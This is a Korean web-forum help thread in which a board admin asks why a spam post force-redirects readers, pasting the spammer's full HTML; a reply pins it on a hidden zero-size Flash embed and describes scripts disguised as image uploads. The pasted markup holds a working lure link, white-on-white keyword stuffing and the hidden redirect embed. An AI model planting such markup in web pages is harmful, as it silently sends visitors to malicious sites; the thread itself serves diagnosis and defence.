글 볼경우 강제 페이지이동..? 정보
글 볼경우 강제 페이지이동..?본문
http://dreamwas.net/bbs/board.php?bo_table=alliance&wr_id=41237&page=0
위가 해당 주소이고요..
뭔가 보안패치가 되야하지 않을까 합니다;;
사실 최근 전혀 패치를 적용하지 않았지만;;;
위 페이지에 관련된 패치는 없었던것같은대 ;; 어떤 태그를 막아야하는게 아닌지?
(사실 제 눈엔 딱히 문제가 될만한 태그가 안보임 ㅠㅠ)
이동주소는 http://movs.wo.to/file/sever3.htm 인대 어떤원리도 이동되는건지 ㅠㅠ;
아래가 어느한 광고꾼이 홍보한 글...
(사이트 방문자수가 늘어날까 해서 막지 않고있음 ㅋㅋ)
<p><A href="http://movs.wo.to/file/sever3.htm" target=_new><font size="3" color="red">오토마우스2다운 다운로드 (전송모드:초고속)<font size="1" color="blue">전송속도:6.25MB / sec</p>
<p><font size="1" color="black">↑↑게임파일명을 클릭해주세요. 저작권 문제로 삭제당할 수 있으니 빨리 받아가세요^^↑↑</p>
<p></p>
<p></p>
<p></p>
<CENTER></CENTER><FONT color=#ffffff size=2>오토마우스2다운 의 주소 / 오토마우스2다운 의 다운로드 / 오토마우스2다운 의 홈페이지 / 오토마우스2다운 포인트받기 / 오토마우스2다운 뮤료 쿠폰</FONT>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p><embed src="http://eq.freechal.com/flvPlayer.swf?docId=2283792&serviceId=QT00" allowFullScreen=true width=500 height=425 type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></p>
<FONT color=#ffffff size=0>오토마우스2다운 동영상과 관련해 다시는 이런 일이 없을 것이라며 깊이 사죄드린다.고 밝혔다. 7일 오후 오토마우스2다운 엔터테인먼트 측은 과의 전화통화에서 지난 해 8월 스케줄에 따라 이동하는 과정에서 발생했다며 이런 불미스러운 오토마우스2다운 사건이 일어난
것에 대해 팬 여러분들께 깊이 사죄를 드린다고 밝혔다. 덧붙여 앞으로 다시는 이러한 일이 발생하지 않도록 매니저들은 물론 회사 차원에서도 최선의 노력을 다할 것이다. 오토마우스2다운 다시 한 번 깊이 사죄드린다고 말했다. 이에 앞서 이날 각종 인터넷 포털 사이트와
커뮤니티 사이트에는 샤이니의 멤버들이 이동하던 중 옆에 있던 한 여학생의 머리를 오토마우스2다운 뒤에서 때린 문제의 동영상이 올라오면서 문제가 불거졌다. 샤이니의 매니저가 여성 팬의 머리를 때리는 화면이 공개돼 파문이 일었다. 온라인으로 받아보는
오토마우스2다운 스포츠 신문 디지털 무가지 매일 2판 발행 ☞</FONT>
<p></p>
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014005_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/013/163013004_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014004_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/011/163011003_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/013/163013003_L.jpg">
<EMBED src="http://movs.wo.to/file/sever3.swf" width=0 height=0>
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/012/163012003_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/011/163011002_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014003_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/013/163013002_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/011/163011001_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014002_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/005/163005001_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014001_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/012/163012001_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/013/163013001_L.jpg">
<IMG src="http://img.kbs.co.kr/cms/ICSFiles/artimage/2009/11/23/c_d_chuno402/06.jpg">
<IMG src="http://img.kbs.co.kr/cms/ICSFiles/artimage/2009/11/23/c_d_chuno402/05.jpg">
<IMG src="http://img.kbs.co.kr/cms/ICSFiles/artimage/2009/11/23/c_d_chuno402/04.jpg">
<IMG src="http://img.kbs.co.kr/cms/ICSFiles/artimage/2009/11/23/c_d_chuno402/01.jpg">
<p>ㅁㅇㅇㅊ@ㅊㅊㅊㅇㅋㅋ</p>
<p>凹凹凹凹凹凹凹凹凹凹凹凹凹凹凹凹凹凹</p>
</body>1485
위가 해당 주소이고요..
뭔가 보안패치가 되야하지 않을까 합니다;;
사실 최근 전혀 패치를 적용하지 않았지만;;;
위 페이지에 관련된 패치는 없었던것같은대 ;; 어떤 태그를 막아야하는게 아닌지?
(사실 제 눈엔 딱히 문제가 될만한 태그가 안보임 ㅠㅠ)
이동주소는 http://movs.wo.to/file/sever3.htm 인대 어떤원리도 이동되는건지 ㅠㅠ;
아래가 어느한 광고꾼이 홍보한 글...
(사이트 방문자수가 늘어날까 해서 막지 않고있음 ㅋㅋ)
<p><A href="http://movs.wo.to/file/sever3.htm" target=_new><font size="3" color="red">오토마우스2다운 다운로드 (전송모드:초고속)<font size="1" color="blue">전송속도:6.25MB / sec</p>
<p><font size="1" color="black">↑↑게임파일명을 클릭해주세요. 저작권 문제로 삭제당할 수 있으니 빨리 받아가세요^^↑↑</p>
<p></p>
<p></p>
<p></p>
<CENTER></CENTER><FONT color=#ffffff size=2>오토마우스2다운 의 주소 / 오토마우스2다운 의 다운로드 / 오토마우스2다운 의 홈페이지 / 오토마우스2다운 포인트받기 / 오토마우스2다운 뮤료 쿠폰</FONT>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p><embed src="http://eq.freechal.com/flvPlayer.swf?docId=2283792&serviceId=QT00" allowFullScreen=true width=500 height=425 type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></p>
<FONT color=#ffffff size=0>오토마우스2다운 동영상과 관련해 다시는 이런 일이 없을 것이라며 깊이 사죄드린다.고 밝혔다. 7일 오후 오토마우스2다운 엔터테인먼트 측은 과의 전화통화에서 지난 해 8월 스케줄에 따라 이동하는 과정에서 발생했다며 이런 불미스러운 오토마우스2다운 사건이 일어난
것에 대해 팬 여러분들께 깊이 사죄를 드린다고 밝혔다. 덧붙여 앞으로 다시는 이러한 일이 발생하지 않도록 매니저들은 물론 회사 차원에서도 최선의 노력을 다할 것이다. 오토마우스2다운 다시 한 번 깊이 사죄드린다고 말했다. 이에 앞서 이날 각종 인터넷 포털 사이트와
커뮤니티 사이트에는 샤이니의 멤버들이 이동하던 중 옆에 있던 한 여학생의 머리를 오토마우스2다운 뒤에서 때린 문제의 동영상이 올라오면서 문제가 불거졌다. 샤이니의 매니저가 여성 팬의 머리를 때리는 화면이 공개돼 파문이 일었다. 온라인으로 받아보는
오토마우스2다운 스포츠 신문 디지털 무가지 매일 2판 발행 ☞</FONT>
<p></p>
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014005_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/013/163013004_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014004_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/011/163011003_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/013/163013003_L.jpg">
<EMBED src="http://movs.wo.to/file/sever3.swf" width=0 height=0>
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/012/163012003_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/011/163011002_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014003_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/013/163013002_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/011/163011001_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014002_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/005/163005001_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/014/163014001_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/012/163012001_L.jpg">
<IMG src="http://img.kbs.co.kr/drama/drama_photo/163/013/163013001_L.jpg">
<IMG src="http://img.kbs.co.kr/cms/ICSFiles/artimage/2009/11/23/c_d_chuno402/06.jpg">
<IMG src="http://img.kbs.co.kr/cms/ICSFiles/artimage/2009/11/23/c_d_chuno402/05.jpg">
<IMG src="http://img.kbs.co.kr/cms/ICSFiles/artimage/2009/11/23/c_d_chuno402/04.jpg">
<IMG src="http://img.kbs.co.kr/cms/ICSFiles/artimage/2009/11/23/c_d_chuno402/01.jpg">
<p>ㅁㅇㅇㅊ@ㅊㅊㅊㅇㅋㅋ</p>
<p>凹凹凹凹凹凹凹凹凹凹凹凹凹凹凹凹凹凹</p>
</body>1485
댓글 전체
<EMBED src="http://movs.wo.to/file/sever3.swf" width=0 height=0> 요넘이 주범이네요.
예전 기억을 더듬어 보면...
예를들어 이미지 파일(jpg, gif) 파일을 업로드 합니다.
하지만 첨부파일로 올린 이미지 파일은 진짜 이미지 파일이 아닌 스크립트가 들어간 파일을 확장자만 바꾼놈입니다.
이놈을 게시판에서는 확장자가 jpg 또는 gif 이니 읽어 드릴려고 합니다.
그러면 이미지가 아닌 스크립트 파일의 내용을 읽어오게 되는거죠
그러면 스크립트 파일이 실행되어 해상 사이트로 넘어가 버리는 원리입니다.
지금꺼가 그렇다는건 아니구요..
제 경험상 그런놈들이 많았습니다 ^^;
예를들어 이미지 파일(jpg, gif) 파일을 업로드 합니다.
하지만 첨부파일로 올린 이미지 파일은 진짜 이미지 파일이 아닌 스크립트가 들어간 파일을 확장자만 바꾼놈입니다.
이놈을 게시판에서는 확장자가 jpg 또는 gif 이니 읽어 드릴려고 합니다.
그러면 이미지가 아닌 스크립트 파일의 내용을 읽어오게 되는거죠
그러면 스크립트 파일이 실행되어 해상 사이트로 넘어가 버리는 원리입니다.
지금꺼가 그렇다는건 아니구요..
제 경험상 그런놈들이 많았습니다 ^^;
저도 들어본적있는대 그누보드에서 그런 버그는 해결되지 않았을까요 ..?
꾀 된걸로 아는대 ...
꾀 된걸로 아는대 ...
